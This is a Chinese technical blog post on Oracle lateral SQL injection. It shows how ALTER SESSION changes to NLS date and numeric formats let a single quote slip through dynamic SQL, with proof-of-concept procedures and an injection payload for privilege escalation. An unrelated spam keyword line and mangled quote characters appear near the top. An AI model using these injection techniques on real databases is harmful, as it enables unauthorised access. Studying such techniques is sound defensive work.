ORACLE LATERAL-SQL-INJECTION 个人见解
怀孕能不能吃皮蛋,卫星电视广播地面接收设施管理规定,熊猫祖玛
如果直接执行sql语句或者参数绑定则不用担心太多,
如以下oracle存储过程
create or replace procedure kjdatepoc(date d)
as
begin
insert into kjdatetable values(d);
commit;
end;
根本不需要担心遭受到sql新型注入攻击,那么在什么地方会发生date 以及 number的注入攻击呢!?一般都是采用了动态sql而又不采用参数绑定的语句。
例如工程师经常用的dbms_sql或者execute immediate
看以下存储过程
create or replace procedure kjdatepoc(date d)
as
begin
execute immediate ‘insert into kjdatetable values('|| d ||')';
commit;
end;
那么遇到以上的存储过程或者函数等,也通过修改session中的nls_date_format中的值达到sql注射的目的,
老外的paper讲解得非常详细了 ,我在这里也不废话。
惟独对于 number类型的注射没有多作讲解 只是简单演示了可以输出单引号!
看以下语句
alter session set nls_numeric_characters=”'.';
select to_number(1000.10001,'999999d99999′)||” from dual;
输出一下结果
1000′10001
只是多了一个单引号,那有什么用呢?乐观的来说!在特定情况下是很有价值的!看以下一个存储过程
create or replace procedure numinjpoc(kjexpnum number,kjexpstr varchar2)
is
secstr varchar2(1000);
begin
secstr:=replace(kjexpstr,””,”””);
sys.dbms_output.put_line('select * from dual where id='||kjexpnum||' and name=”'||secstr||””);
end;
内部对varchar类型进行替换了!我们可以进行测试
begin
numinjpoc(1000,”'–');
end;
其输出sql语句为
select * from dual where id=1000 and name=”'–'
单引号被转义掉了
那么如果我们结合这个number类型怎么进行注射呢?
alter session set nls_numeric_characters=”'.';
begin
numinjpoc(to_number(0.10001,'999999d99999′),'||kj.exp()–');
end;
看看输出结果
select * from dual where id='10001 and name='||kj.exp()–'
这样就可以间接的攻击它…
在某中程度才来需要alter session 配合后,再去攻击系统内部的一些函数或者过程来提升权限。未尝不是一种好的突破思路,但是对于单语句进行sql注射攻击,以结果为向导的话!这样的方式没多大作为。
如对本文有疑问,请在下面进行留言讨论,广大热心网友会与你互动!!
点击进行留言回复
相关文章:
-
-
-
快速向表插入大量数据
当需要对一个非常大的表INSERT的时候,会消耗非常多的资源,因为update表的时候,oracle需要生成 redo log和undo log;此时最...
[阅读全文]
-
-
-
Oracle入门学习五
学习视频: https://www.bilibili.com/video/BV1tJ411r7EC?p=55 数据的完整性:保证插入表格的数据必须正确。...
[阅读全文]
-
Oracle入门学习六
事务:把一组操作看做一个工作单元,要么都执行,要么都不执行。dml操作才有事务,查询没有事务。 开始事务:从上一次的事务结束之后,从第一次dml操作,就...
[阅读全文]
-
-
-
Oracle入门学习一
oracle的安装,用户授权,表格操作,数据类型,ddl表格,dml数据。 下一篇:Oracle入门学习二 学习视频:https://www.bilib...
[阅读全文]
-
Oracle入门学习二
上一篇:Oracle入门学习一 学习视频:https://www.bilibili.com/video/BV1tJ411r7EC?p=15 算术运算符:...
[阅读全文]
网友评论